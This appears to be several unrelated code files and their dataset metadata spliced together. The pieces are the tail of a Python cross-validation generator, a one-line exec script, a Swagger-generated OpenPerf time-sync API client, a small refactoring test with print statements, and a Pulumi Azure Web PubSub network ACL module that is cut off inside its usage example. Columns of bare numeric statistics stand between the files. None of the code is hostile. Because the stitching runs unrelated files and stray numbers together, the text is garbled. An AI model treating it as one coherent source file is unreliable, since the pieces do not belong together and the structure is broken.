train_start = n_era - window_size
train_end = n_era - n_valid
valid_stop = n_era
else:
train_end = train_start + window_size - n_valid
valid_stop = train_start + window_size
print('======================================================')
print('Train Era: {}-{}'.format(train_start, train_end - 1))
print('Valid Era: {}-{}'.format(train_end, valid_stop - 1))
train_era = list(range(train_start, train_end))
valid_era = list(range(train_end, valid_stop))
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in train_era:
train_index.append(ii)
elif ele in valid_era:
valid_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
train_start += n_step
utils.print_cv_info(i+1, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
| 36.393534
| 118
| 0.484485
| 3,996
| 32,645
| 3.649149
| 0.033784
| 0.082293
| 0.017282
| 0.037306
| 0.929502
| 0.907832
| 0.905569
| 0.894939
| 0.893293
| 0.884309
| 0
| 0.003685
| 0.434707
| 32,645
| 896
| 119
| 36.434152
| 0.786496
| 0.030816
| 0
| 0.898361
| 0
| 0
| 0.0279
| 0.00513
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021311
| false
| 0
| 0.011475
| 0
| 0.034426
| 0.062295
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1a04485d230a0956eb1b7c25af7e7d6987dc5d59
| 47
|
py
|
Python
|
runimportComposers.py
|
abilkus/NEA-2
|
150383aa79c66ad1d77c1a39315901c3db537253
|
[
"CC0-1.0"
] | null | null | null |
runimportComposers.py
|
abilkus/NEA-2
|
150383aa79c66ad1d77c1a39315901c3db537253
|
[
"CC0-1.0"
] | 5
|
2020-02-15T13:35:08.000Z
|
2021-06-10T18:23:14.000Z
|
runimportComposers.py
|
abilkus/NEA-2
|
150383aa79c66ad1d77c1a39315901c3db537253
|
[
"CC0-1.0"
] | null | null | null |
exec(open('scripts/importComposers.py').read())
| 47
| 47
| 0.765957
| 6
| 47
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 47
| 1
| 47
| 47
| 0.765957
| 0
| 0
| 0
| 0
| 0
| 0.541667
| 0.541667
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1a175deca7f80cee3d8e76104fe89f666c95cb73
| 26,222
|
py
|
Python
|
tests/aat/api/v1/client/api/time_sync_api.py
|
DerangedMonkeyNinja/openperf
|
cde4dc6bf3687f0663c11e9e856e26a0dc2b1d16
|
[
"Apache-2.0"
] | 20
|
2019-12-04T01:28:52.000Z
|
2022-03-17T14:09:34.000Z
|
tests/aat/api/v1/client/api/time_sync_api.py
|
DerangedMonkeyNinja/openperf
|
cde4dc6bf3687f0663c11e9e856e26a0dc2b1d16
|
[
"Apache-2.0"
] | 115
|
2020-02-04T21:29:54.000Z
|
2022-02-17T13:33:51.000Z
|
tests/aat/api/v1/client/api/time_sync_api.py
|
DerangedMonkeyNinja/openperf
|
cde4dc6bf3687f0663c11e9e856e26a0dc2b1d16
|
[
"Apache-2.0"
] | 16
|
2019-12-03T16:41:18.000Z
|
2021-11-06T04:44:11.000Z
|
# coding: utf-8
"""
OpenPerf API
REST API interface for OpenPerf # noqa: E501
OpenAPI spec version: 1
Contact: support@spirent.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from client.api_client import ApiClient
class TimeSyncApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_time_source(self, timesource, **kwargs): # noqa: E501
"""Register a time source for time syncing. # noqa: E501
Registers a new time source for time syncing. Time sources are immutable. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_time_source(timesource, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TimeSource timesource: New time source (required)
:return: TimeSource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_time_source_with_http_info(timesource, **kwargs) # noqa: E501
else:
(data) = self.create_time_source_with_http_info(timesource, **kwargs) # noqa: E501
return data
def create_time_source_with_http_info(self, timesource, **kwargs): # noqa: E501
"""Register a time source for time syncing. # noqa: E501
Registers a new time source for time syncing. Time sources are immutable. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_time_source_with_http_info(timesource, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TimeSource timesource: New time source (required)
:return: TimeSource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['timesource'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_time_source" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'timesource' is set
if ('timesource' not in params or
params['timesource'] is None):
raise ValueError("Missing the required parameter `timesource` when calling `create_time_source`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'timesource' in params:
body_params = params['timesource']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-sources', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TimeSource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_time_source(self, id, **kwargs): # noqa: E501
"""Delete a time source # noqa: E501
Deletes an existing time source. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_time_source(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_time_source_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_time_source_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_time_source_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a time source # noqa: E501
Deletes an existing time source. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_time_source_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_time_source" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_time_source`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-sources/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_time_counter(self, id, **kwargs): # noqa: E501
"""Get a time counter # noqa: E501
Returns a time counter, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_time_counter(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TimeCounter
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_time_counter_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_time_counter_with_http_info(id, **kwargs) # noqa: E501
return data
def get_time_counter_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a time counter # noqa: E501
Returns a time counter, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_time_counter_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TimeCounter
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_time_counter" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_time_counter`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-counters/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TimeCounter', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_time_keeper(self, **kwargs): # noqa: E501
"""Get a time keeper. # noqa: E501
Returns the system time keeper, aka clock. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_time_keeper(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: TimeKeeper
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_time_keeper_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_time_keeper_with_http_info(**kwargs) # noqa: E501
return data
def get_time_keeper_with_http_info(self, **kwargs): # noqa: E501
"""Get a time keeper. # noqa: E501
Returns the system time keeper, aka clock. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_time_keeper_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: TimeKeeper
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_time_keeper" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-keeper', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TimeKeeper', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_time_source(self, id, **kwargs): # noqa: E501
"""Get a time source # noqa: E501
Get a time source, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_time_source(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TimeSource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_time_source_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_time_source_with_http_info(id, **kwargs) # noqa: E501
return data
def get_time_source_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a time source # noqa: E501
Get a time source, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_time_source_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TimeSource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_time_source" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_time_source`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-sources/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TimeSource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_time_counters(self, **kwargs): # noqa: E501
"""List time counters # noqa: E501
The `time-counters` endpoint returns all local time counters that are available for measuring the passage of time. This list is for informational purposes only. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_time_counters(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TimeCounter]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_time_counters_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_time_counters_with_http_info(**kwargs) # noqa: E501
return data
def list_time_counters_with_http_info(self, **kwargs): # noqa: E501
"""List time counters # noqa: E501
The `time-counters` endpoint returns all local time counters that are available for measuring the passage of time. This list is for informational purposes only. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_time_counters_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TimeCounter]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_time_counters" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-counters', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TimeCounter]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_time_sources(self, **kwargs): # noqa: E501
"""List reference clocks # noqa: E501
The `time-sources` endpoint returns all time sources that are used for syncing the local time. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_time_sources(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TimeSource]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_time_sources_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_time_sources_with_http_info(**kwargs) # noqa: E501
return data
def list_time_sources_with_http_info(self, **kwargs): # noqa: E501
"""List reference clocks # noqa: E501
The `time-sources` endpoint returns all time sources that are used for syncing the local time. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_time_sources_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TimeSource]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_time_sources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-sources', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TimeSource]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 37.247159
| 184
| 0.601175
| 3,017
| 26,222
| 4.97713
| 0.060325
| 0.056473
| 0.026105
| 0.033564
| 0.954315
| 0.95305
| 0.947523
| 0.939798
| 0.933338
| 0.931939
| 0
| 0.017924
| 0.30852
| 26,222
| 703
| 185
| 37.300142
| 0.810225
| 0.33552
| 0
| 0.806452
| 1
| 0
| 0.160627
| 0.028864
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040323
| false
| 0
| 0.010753
| 0
| 0.110215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a7f96a9bc5968adcc80c257a4d10789327071e39
| 304
|
py
|
Python
|
python/testData/refactoring/inlineFunction/noReturnsAsExpressionStatement/main.after.py
|
tgodzik/intellij-community
|
f5ef4191fc30b69db945633951fb160c1cfb7b6f
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/refactoring/inlineFunction/noReturnsAsExpressionStatement/main.after.py
|
tgodzik/intellij-community
|
f5ef4191fc30b69db945633951fb160c1cfb7b6f
|
[
"Apache-2.0"
] | 2
|
2022-02-19T09:45:05.000Z
|
2022-02-27T20:32:55.000Z
|
python/testData/refactoring/inlineFunction/noReturnsAsExpressionStatement/main.after.py
|
tgodzik/intellij-community
|
f5ef4191fc30b69db945633951fb160c1cfb7b6f
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def foo(x, y):
s = x + y
if s > 10:
print("s>10")
elif s > 5:
print("s>5")
else:
print("less")
print("over")
def bar():
s = 1 + 2
if s > 10:
print("s>10")
elif s > 5:
print("s>5")
else:
print("less")
print("over")
| 14.47619
| 21
| 0.381579
| 46
| 304
| 2.521739
| 0.347826
| 0.103448
| 0.086207
| 0.172414
| 0.827586
| 0.827586
| 0.827586
| 0.827586
| 0.827586
| 0.827586
| 0
| 0.080925
| 0.430921
| 304
| 20
| 22
| 15.2
| 0.589595
| 0
| 0
| 0.777778
| 0
| 0
| 0.098684
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0
| 0
| 0.111111
| 0.444444
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
c54aea195b8a7b7c49d6ba493b22dcbe74ae6c90
| 19,481
|
py
|
Python
|
sdk/python/pulumi_azure/webpubsub/network_acl.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/webpubsub/network_acl.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/webpubsub/network_acl.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['NetworkAclArgs', 'NetworkAcl']
@pulumi.input_type
class NetworkAclArgs:
def __init__(__self__, *,
public_network: pulumi.Input['NetworkAclPublicNetworkArgs'],
web_pubsub_id: pulumi.Input[str],
default_action: Optional[pulumi.Input[str]] = None,
private_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]]] = None):
"""
The set of arguments for constructing a NetworkAcl resource.
:param pulumi.Input['NetworkAclPublicNetworkArgs'] public_network: A `public_network` block as defined below.
:param pulumi.Input[str] web_pubsub_id: The ID of the Web Pubsub service. Changing this forces a new resource to be created.
:param pulumi.Input[str] default_action: The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
:param pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]] private_endpoints: A `private_endpoint` block as defined below.
"""
pulumi.set(__self__, "public_network", public_network)
pulumi.set(__self__, "web_pubsub_id", web_pubsub_id)
if default_action is not None:
pulumi.set(__self__, "default_action", default_action)
if private_endpoints is not None:
pulumi.set(__self__, "private_endpoints", private_endpoints)
@property
@pulumi.getter(name="publicNetwork")
def public_network(self) -> pulumi.Input['NetworkAclPublicNetworkArgs']:
"""
A `public_network` block as defined below.
"""
return pulumi.get(self, "public_network")
@public_network.setter
def public_network(self, value: pulumi.Input['NetworkAclPublicNetworkArgs']):
pulumi.set(self, "public_network", value)
@property
@pulumi.getter(name="webPubsubId")
def web_pubsub_id(self) -> pulumi.Input[str]:
"""
The ID of the Web Pubsub service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "web_pubsub_id")
@web_pubsub_id.setter
def web_pubsub_id(self, value: pulumi.Input[str]):
pulumi.set(self, "web_pubsub_id", value)
@property
@pulumi.getter(name="defaultAction")
def default_action(self) -> Optional[pulumi.Input[str]]:
"""
The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
"""
return pulumi.get(self, "default_action")
@default_action.setter
def default_action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_action", value)
@property
@pulumi.getter(name="privateEndpoints")
def private_endpoints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]]]:
"""
A `private_endpoint` block as defined below.
"""
return pulumi.get(self, "private_endpoints")
@private_endpoints.setter
def private_endpoints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]]]):
pulumi.set(self, "private_endpoints", value)
@pulumi.input_type
class _NetworkAclState:
def __init__(__self__, *,
default_action: Optional[pulumi.Input[str]] = None,
private_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]]] = None,
public_network: Optional[pulumi.Input['NetworkAclPublicNetworkArgs']] = None,
web_pubsub_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering NetworkAcl resources.
:param pulumi.Input[str] default_action: The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
:param pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]] private_endpoints: A `private_endpoint` block as defined below.
:param pulumi.Input['NetworkAclPublicNetworkArgs'] public_network: A `public_network` block as defined below.
:param pulumi.Input[str] web_pubsub_id: The ID of the Web Pubsub service. Changing this forces a new resource to be created.
"""
if default_action is not None:
pulumi.set(__self__, "default_action", default_action)
if private_endpoints is not None:
pulumi.set(__self__, "private_endpoints", private_endpoints)
if public_network is not None:
pulumi.set(__self__, "public_network", public_network)
if web_pubsub_id is not None:
pulumi.set(__self__, "web_pubsub_id", web_pubsub_id)
@property
@pulumi.getter(name="defaultAction")
def default_action(self) -> Optional[pulumi.Input[str]]:
"""
The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
"""
return pulumi.get(self, "default_action")
@default_action.setter
def default_action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_action", value)
@property
@pulumi.getter(name="privateEndpoints")
def private_endpoints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]]]:
"""
A `private_endpoint` block as defined below.
"""
return pulumi.get(self, "private_endpoints")
@private_endpoints.setter
def private_endpoints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkAclPrivateEndpointArgs']]]]):
pulumi.set(self, "private_endpoints", value)
@property
@pulumi.getter(name="publicNetwork")
def public_network(self) -> Optional[pulumi.Input['NetworkAclPublicNetworkArgs']]:
"""
A `public_network` block as defined below.
"""
return pulumi.get(self, "public_network")
@public_network.setter
def public_network(self, value: Optional[pulumi.Input['NetworkAclPublicNetworkArgs']]):
pulumi.set(self, "public_network", value)
@property
@pulumi.getter(name="webPubsubId")
def web_pubsub_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Web Pubsub service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "web_pubsub_id")
@web_pubsub_id.setter
def web_pubsub_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "web_pubsub_id", value)
class NetworkAcl(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
default_action: Optional[pulumi.Input[str]] = None,
private_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkAclPrivateEndpointArgs']]]]] = None,
public_network: Optional[pulumi.Input[pulumi.InputType['NetworkAclPublicNetworkArgs']]] = None,
web_pubsub_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages the Network ACL for a Web Pubsub.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="east us")
example_service = azure.webpubsub.Service("exampleService",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="Standard_S1",
capacity=1)
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
address_spaces=["10.5.0.0/16"])
example_subnet = azure.network.Subnet("exampleSubnet",
resource_group_name=example_resource_group.name,
